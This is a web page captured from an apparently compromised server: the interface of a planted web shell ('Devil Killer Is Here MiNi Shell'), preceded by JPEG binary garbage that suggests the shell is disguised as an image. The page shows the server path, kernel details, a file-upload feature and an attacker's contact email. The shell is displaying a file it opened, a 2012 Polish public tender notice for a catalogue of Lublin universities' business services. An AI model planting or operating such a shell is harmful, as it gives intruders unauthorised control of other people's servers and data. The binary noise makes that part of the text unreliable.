JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120711/245750-N-2012.html

<p class="kh_header"><b>Lublin: Opracowanie i wydanie katalogu ofert usług lubelskich uczelni świadczonych na rzecz biznesu wraz z wysyłką do wybranych firm.
Znak sprawy: LPNT/PN/RPLU.02.03.02/02/2012</b><br>
<b>Numer ogłoszenia: 245750 - 2012; data zamieszczenia: 11.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubelski Park Naukowo-Technologiczny Spółka Akcyjna , ul. Dobrzańskiego 3, 20-262 Lublin, woj. lubelskie, tel. 81 534 61 00, faks 81 531 85 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lpnt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i wydanie katalogu ofert usług lubelskich uczelni świadczonych na rzecz biznesu wraz z wysyłką do wybranych firm.
Znak sprawy: LPNT/PN/RPLU.02.03.02/02/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.Opis przedmiotu zamówienia 
3.1. Kontekst przedmiotu zamówienia
Zamawiana usługa jest realizowana w ramach projektu Rozwój oraz promocja działalności Lubelskiego Parku Naukowo - Technologicznego S.A. jako instytucji otoczenia biznesu i transferu wiedzy, realizowanego na podstawie umowy zawartej w ramach II Osi Priorytetowej Działania 2.3. Schemat B Regionalnego Programu Operacyjnego Województwa Lubelskiego 2007-2013 pomiędzy Lubelską Agencją Wspierania Przedsiębiorczości a Lubelskim Parkiem Naukowo - Technologicznym S.A. (beneficjentem projektu).
Celem ogólnym projektu jest rozwój i promocja Lubelskiego Parku Naukowo - Technologicznego S.A., w związku z planowanym oddaniem do użytku nowych części budynku po zakończeniu procesu inwestycyjnego oraz prac adaptacyjnych.
3.2. Przedmiot zamówienia
3.2.1.Przedmiotem zamówienia jest opracowanie i wydanie katalogu ofert usług lubelskich uczelni świadczonych na rzecz biznesu wraz z wysyłką do wybranych firm. 
3.2.1.1. Tytuł opracowania będzie miał następujące brzmienie: Badania, ekspertyzy i szkolenia na uczelniach lubelskich. Katalog ofert. 
3.2.1.2.Wykonawca zobowiązany jest opracować treść katalogu na podstawie autoryzowanych informacji uzyskanych od stosownych komórek organizacyjnych na następujących lubelskich uczelniach: 
- Uniwersytet Marii Curie- Skłodowskiej w Lublinie,
- Katolicki Uniwersytet Lubelski im. Jana Pawła II,
- Politechnika Lubelska
- Uniwersytet Przyrodniczy w Lublinie
- Uniwersytet Medyczny w Lublinie
- Wyższa Szkoła Ekonomii i Innowacji w Lublinie
- Wyższa Szkoła Nauk Społecznych w Lublinie
- Wyższa Szkoła Przedsiębiorczości i Administracji w Lublinie
- Wyższa Szkoła Społeczno-Przyrodnicza im. W. Pola w Lublinie

3.2.1.3. Wykonawca jest zobowiązany do przedstawienia autoryzowanych informacji uzyskanych z odpowiednich uczelni . Autoryzacja winna być poświadczona na piśmie przez osoby reprezentujące daną uczelnię  lub stosownym upoważnieniem  wydanym dla osoby lub osób udzielających informacji do katalogu (wzór upoważnienia stanowi załącznik nr 8).

3.2.1.4. Wykonawca jest zobowiązany na bieżąco referować Zamawiającemu postęp prac nad opracowaniem katalogu, jak również przedstawiać postęp prac na spotkaniach w siedzibie Zamawiającego w ten sposób, żeby odbyły się  przynajmniej dwa spotkania  na wstępie opracowania i na dwa tygodnie przed złożeniem przedmiotu umowy, przy czym o terminie spotkania powinien powiadomić Zamawiającego z tygodniowym wyprzedzeniem. Spotkania mają na celu dostosowanie wizji Wykonawcy do wymagań Zamawiającego. Po każdym spotkaniu Wykonawca zobowiązany jest sporządzić notatkę służbową ze spotkania i przekazać Zamawiającemu. Odwołanie któregokolwiek spotkania przez Zamawiającego nie ma wpływu na terminy określone w p. 4.1. 

3.2.1.5. Wykonawca jest zobowiązany opracować treść katalogu wykorzystując zakres merytoryczny nie węższy niż przedstawiona poniżej struktura:
1.Wstęp.
2.Przedstawienie kontekstu projektu, celu powstania katalogu,
3.Lublin i lubelskie uczelnie w statystykach (np. miasto Lublin: ilość mieszkańców w tym trendy demograficzne na wykresie, ilość osób na stanowiskach naukowo-dydaktycznych,  ilość publicznych i niepublicznych uczelni oraz filii i punktów konsultacyjnych należących do jednostek spoza regionu, porównanie wszystkich uczelni na wykresach słupkowych pod względem: ilości kształcących się studentów, ilości profesorów, dr hab., magistrów, % mieszkańców Lublina posiadających dyplom szkoły wyższej, % mieszkańców, którzy nie przekroczyli 35 roku życia, struktura biznesu (Lublin) w zestawieniach od roku 2009: liczba przedsiębiorstw z podziałem na mikro, małe, średnie, duże (wykresy), struktura przedsiębiorstw wg branż (wykres aktualny), udział przedsiębiorstw w aplikowaniu o środki pomocowe w obecnym okresie finansowania, wg programów (ogólnie, np. na doradztwo, na innowacje), liczba innowacji wdrożonych w przedsiębiorstwach z udziałem uczelni (uczelnie lubelskie oraz porównanie z resztą kraju) oraz inne zestawienia statystyczne istotne z punktu widzenia niniejszego opracowania. 
4.Zarys  kierunków badawczych  uczelni w rozbiciu na poszczególne jednostki ( ograniczenie ilości znaków, max 1000 znaków.)
5.Zakres badań wykonywanych przez daną uczelnię, dotyczy badania jednostkowego lub serii badań w oparciu o znane wymagania normowe takie jak: PN- EN, BS, ASTM, DIN, ISO, aprobaty techniczne i inne odpowiednie, 
6.Badania z wykorzystaniem znanych i uznanych metod badawczych. 
7.Badania z wykorzystaniem znanych i uznanych aparatów badawczych. 
8.Ekspertyzy wg. definicji Słownika Polskiego w zakresie proponowanych tematów, potwierdzone listą  wykonanych opracowań tj., co najmniej jednym opracowaniem z danego tematu. Wskazane opracowanie winno zawierać treść bez wskazania kontrahenta.
9.Szkolenia ogólne i specjalistyczne  potwierdzone listą wykonanych szkoleń tj., co najmniej jednym szkoleniem  z danego tematu. Wskazane szkolenie  winno zawierać treść bez wskazania kontrahenta.
10.Opinie o innowacyjności potwierdzone listą wykonanych opinii  tj., co najmniej jedna opinia  z danego tematu. Wskazana opinia   winna zawierać treść bez wskazania kontrahenta.
11.Przedstawione  przykłady ekspertyz , opinii  i szkoleń mogą się odnosić   maksymalnie  do trzech lat wstecz  czyli nie dłużej niż do 2009 roku.
12.Wydawca informatora: Lubelski Park Naukowo - Technologiczny S.A.
3.2.2. Wymagania dotyczące publikacji
Z dniem ostatecznej akceptacji treści i formy opracowania, Wykonawca zobowiązany będzie dostarczyć wersję finalną katalogu w formie publikacji (1000 egzemplarzy z możliwością dodruku) oraz w wersji elektronicznej (płyta CD DVD w standardzie Microsoft Office oraz PDF.).
Wymagania techniczne:
-zgodność z systemem identyfikacji wizualnej projektu, zamieszczenie oznaczeń zgodnych z Wytycznymi dla Beneficjentów w zakresie informacji i promocji w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013 (kolorowe oznaczenia na każdej stronie),
-skład, łamanie i korekta,
-format B5, klejony, 
-nakład: 1000 egzemplarzy - z możliwością dodruku (przekazanie Zamawiającemu plików graficznych opracowania w formacie umożliwiającym druk),
-materiał: okładka lakierowana (gramatura: 200-300 g/m2), środek: papier offsetowy
-tabele, wykresy, rysunki, diagramy - układ kolorowy
3.2.3. Wymagania dotyczące wysyłki
Po dostarczeniu wszystkich egzemplarzy Zamawiającemu, Wykonawca będzie zobowiązany dokonać wysyłki poleconej wersji finalnej katalogu do 100 przedsiębiorców wskazanych Wykonawcy przez Zamawiającego wraz z pismem przewodnim wystosowanym przez Zamawiającego, przy czym Wykonawca będzie musiał potwierdzić fakt wykonania wysyłki poprzez przekazanie Zamawiającemu raportu zawierającego listę odbiorców, wraz z potwierdzeniem (pieczątka przy każdym odbiorcy) wysłania przez stosowną instytucję świadczącą usługi w tym zakresie.
3.3. W ramach realizacji przedmiotu zamówienia Wykonawca przenosi na Zamawiającego pełnię majątkowych praw autorskich do przedmiotu umowy na wszystkich znanych w dacie zawarcia umowy polach eksploatacji. Przeniesienie majątkowych praw autorskich, o którym mowa w zdaniu pierwszym dotyczy w szczególności praw do wprowadzania przedmiotu umowy do obrotu, prawo użyczania lub najmu egzemplarzy przedmiotu umowy oraz rozpowszechniania przedmiotu umowy w każdej formie m.in. papierowej ale również elektronicznej i za pośrednictwem sieci komputerowych, oraz w inny sposób np.: poprzez publiczne udostępnianie przedmiotu umowy. Wykonawca ponadto udzieli zezwolenia Zamawiającemu na rozporządzanie i korzystanie z opracowań przedmiotu umowy, a ponadto przeniesie na Zamawiającego uprawnienie do udzielania zezwoleń na rozporządzanie i korzystanie z opracowań przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.16.00.00-9, 79.30.00.00-8, 78.94.00.00-8, 79.80.00.00-2, 79.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium.
Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 1200,00 PLN (słownie: jeden tysiąc złotych dwieście złotych, zero groszy).
Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
a) pieniądzu, przelewem na rachunek bankowy Zamawiającego:
92 1160 2202 0000 0001 1618 7785 Bank Millenium S.A. Oddział w Lublinie przed terminem składania ofert, z podaniem tytułu wadium - przetarg nieograniczony znak sprawy LPNT/PN/RPLU.02.03.02/02/2012.
b)poręczeniach bankowych;
c)poręczeniach pieniężnych spółdzielczych kas oszczędnościowo - kredytowych;
d)gwarancjach bankowych;
e)gwarancjach ubezpieczeniowych;
f)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. jedn. Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.).
Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. Wadium wnoszone w ww. formie powinno być wystawione na: Lubelski Park Naukowo-Technologiczny S.A., 20-262 Lublin, ul. Dobrzańskiego 3. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy z dnia 29 stycznia 2004 r - Prawo zamówień publicznych.
Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany  rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert. Terminem wpływu wadium jest termin uznania rachunku bankowego Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparci o przedłożone przez wykonawców dokumenty i oświadczenia. W zakresie warunku posiadania wiedzy i doświadczenia jako spełniający warunki udziału w postępowaniu zostaną ocenieni Wykonawcy, którzy wykażą iż w okresie ostatnich trzech lat przed upływem terminu składania ofert należycie wykonali przynajmniej   trzy usługi o charakterze analitycznym lub systematyzujące zbiór informacji w dowolnej dziedzinie (np. informatory, analizy, raporty ewaluacyjne, ekspertyzy, studia wykonalności), a wartość każdej z tych usług nie była mniejsza niż 30.000 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia. W zakresie warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawcy muszą wykazać się dysponowaniem następującym zespołem osób: co najmniej cztery osoby posiadające wykształcenie wyższe oraz udokumentowane doświadczenie w zakresie wykonania dowolnego rodzaju opracowania o charakterze analitycznym lub systematyzującego zbiór informacji w dowolnej dziedzinie (np. informatory, analizy, raporty ewaluacyjne, ekspertyzy, studia wykonalności) .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty pełnomocnictwa, oświadczenie o części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom w przypadku powierzenia przez wykonawcę części zamówienia podwykonawcom oraz w przypadku wniesienia wadium w innej formeie niż w pieniądzu odpowiednie dokumenty poręczeń lub gwarancji.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umownych dotyczących:
osób, które będą uczestniczyć w wykonywaniu zamówienia w stosunku do treści oferty Wykonawcy w następujących przypadkach:
- śmierci, choroby lub innych zdarzeń losowych,
- jeżeli zmiana stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji danej osoby, utraty uprawnień, itp.),
- nie wywiązywania się osób uczestniczących w wykonaniu zamówienia z obowiązków wynikających z umowy,
przy czym zmiana musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy doświadczenie wskazanych osób będzie takie same lub wyższe od doświadczenia osób wymaganego postanowieniami niniejszej specyfikacji istotnych warunków zamówienia.
przedmiotu zamówienia i obniżenia ceny w następujących przypadkach:
- gdy będzie to konieczne ze względu na zmianę przepisów prawa związanych z przedmiotem zamówienia;
- zmiany zasad lub kwoty dofinansowania Projektu;
- zaistnienia podczas realizacji zamówienia okoliczności, których Zamawiający nie był w stanie przewidzieć, a które powodują, że wykonanie Umowy nie leży w interesie Zamawiającego,
- zmniejszenia zakresu przedmiotu zamówienia,
w takich przypadkach Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonanej części Umowy.
Powyższe zmiany wymagają dla swej ważności formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lpnt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubelski Park Naukowo - Technologiczny Spółka Akcyjna, 20 - 262 Lublin, ul. Dobrzańskiego 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2012 godzina 13:00, miejsce: Oferty należy składać w siedzibie Lubelskiego Parku Naukowo Technologicznego S.A. przy ul. Dobrzańskiego 3 w Lublinie (sekretariat LPNT S.A. mieści się w pokoju nr 5D008)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiana usługa jest finansowana w ramach projektu: Rozwój oraz promocja działalności Lubelskiego Parku Naukowo - Technologicznego S.A. jako instytucji otoczenia biznesu i transferu wiedzy, realizowanego na podstawie umowy zawartej w ramach II Osi Priorytetowej Działania 2.3. Schemat B Regionalnego Programu Operacyjnego Województwa Lubelskiego 2007-2013 pomiędzy Lubelską Agencją Wspierania Przedsiębiorczości a Lubelskim Parkiem Naukowo - Technologicznym S.A. (beneficjentem projektu). Celem ogólnym projektu jest rozwój i promocja Lubelskiego Parku Naukowo - Technologicznego S.A., w związku z planowanym oddaniem do użytku nowych części budynku po zakończeniu procesu inwestycyjnego oraz prac adaptacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com